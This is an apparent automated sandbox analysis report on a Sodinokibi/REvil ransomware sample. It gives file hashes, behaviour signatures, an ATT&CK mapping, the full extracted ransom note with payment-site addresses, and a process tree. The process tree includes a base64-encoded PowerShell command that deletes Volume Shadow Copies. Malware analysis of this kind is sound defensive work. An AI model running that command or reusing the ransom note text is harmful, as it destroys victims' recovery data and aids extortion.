Analysis

  • max time kernel
    118s
  • max time network
    132s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    24-01-2022 02:09

General

  • Target

    4a0f399840bb73f3b70d4461ec1a37cffcb3e4789c876042d133ed903c5d9333.exe

  • Size

    164KB

  • MD5

    96b14c03ea5bb2e3f554f378a2d913aa

  • SHA1

    7cb414191f445d1bd8ef54e99b4b033b80f61075

  • SHA256

    4a0f399840bb73f3b70d4461ec1a37cffcb3e4789c876042d133ed903c5d9333

  • SHA512

    76633a9a18e9cc40ba76754ad547cf048935c127e6646a0d288d82909ac42cd811826aaa33d764f1d3a3ea42b672267aeb09f9a2b065549ffc29028357ccfea9

Score
10/10

Malware Config

Extracted

Path

C:\3bqjlpw-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your computer has extension 3bqjlpw. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/4282D76D20BC9CE1 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/4282D76D20BC9CE1 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: s7zAdp86ms8bNnnJZKHTg0QLtYauRpQsPp2h1PI1w7Rm9Yw1g9cm7B+W7mSf7F7K 6qJkpiPVvezS56Oq7fx+cOaBNum2HDcOwNkuNwU9ldeHan4jhIA/quWImgy1KfNS yT6WcbJqw6qn8dI1awc5iwPX5l+lb2btKs2uIWliAN075qlA1FmrwCbSqX7VxqAl BIXjl47BNDh+3OjiQlIIEvus+AXKhBxYzeVXP+G0Tong50/SlqMOqjYmwxD6UIGM HFhD9wQvG0nexD/kkkTM26vhhVgpfCgF5qb2HTAP63gFWLZikV6/jgM1A8NbpXu2 P/bP98GIuHDExoe04swk9PTs65j2FA+kYBeV7W+XFDxciO1tSzKwmdEaSuIgWBXA 1d0HAD72sfKPs1dPiUM0xfpjcAVzQxoVzCyVmPkknUqQo32YywWR/aBiKTlzaaMS EbIzAeExd8MEeY6BrM5oTyZSwrombOSHM00aDz1l6b8yf1AFWnUs9yIcPDJ4EPT+ 1Mk2m879y1RPC/kOesR7mdOP3YnS/q5zxDWHENuC+++SNPuVztAFVn0xsEiQrm5L nOFb6QPtcA+0JTlUgyjooFMEhK9feanKL0CeoIQ5XYLpAbrrC1r5S1LwxaM0qbQ3 nbFRlUUfxLLP0Z+HzHyuYrEU0lwumK0jDK3Cehbmg0j5ImJAb0WpChMeBCw0w7FP jrO/ykPjXnGB2dcD9TlxWYDPnpmE8e1zCw/W2ZWr9PuhSlpzzXGXiov10/Yz8Xha tDWte2vqrdBkJPzyi9yhJqH3bNC043JKOYrXue7IbR/j18d8KkGZxbU/KA/AlyMa +T6S9cwmdlTBxAd42mzu44lUJDEpuRreP6P8eJ0z4k8IPVbsjQZW6kSQOrWgYmd5 26flQa8c9Sk3d/AKwcRu0W/qwUD8Knmweu3IvDVaYwlEgdQAXzoR6hMr43NoKTj9 +32FKaTKXPqLt/vpeQ0UJNAQUVVOrTEuAxzPUUl2vLb/2lO/9eDFOrrqw5xN4jyH jkVkocrIFc5IlG22RHhyqaAb125oFfMtii6nD+Hrau/dkbMiazqJorxs+rCzbrrV dLfu9m+bjoPsNaixdzM2lOmDynlWrAR1QhKSkLHG3wziPfr6zi8YfqHkTNw35yYo b3jrghgw Extension name: 3bqjlpw ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/4282D76D20BC9CE1

http://decryptor.top/4282D76D20BC9CE1

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Modifies extensions of user files 6 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 27 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\4a0f399840bb73f3b70d4461ec1a37cffcb3e4789c876042d133ed903c5d9333.exe
    "C:\Users\Admin\AppData\Local\Temp\4a0f399840bb73f3b70d4461ec1a37cffcb3e4789c876042d133ed903c5d9333.exe"
    1⤵
    • Modifies extensions of user files
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1840
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:692
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:1244
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1292

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Discovery

    Query Registry

    1
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    1
    T1082

    Impact

    Defacement

    1
    T1491

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/692-56-0x000007FEFB781000-0x000007FEFB783000-memory.dmp
      Filesize

      8KB

    • memory/692-58-0x00000000024B0000-0x00000000025B2000-memory.dmp
      Filesize

      1.0MB

    • memory/692-59-0x00000000025B2000-0x00000000025B4000-memory.dmp
      Filesize

      8KB

    • memory/692-60-0x00000000025B4000-0x00000000025B7000-memory.dmp
      Filesize

      12KB

    • memory/692-57-0x000007FEF2A20000-0x000007FEF357D000-memory.dmp
      Filesize

      11.4MB

    • memory/692-61-0x00000000025BB000-0x00000000025DA000-memory.dmp
      Filesize

      124KB

    • memory/1840-55-0x0000000075421000-0x0000000075423000-memory.dmp
      Filesize

      8KB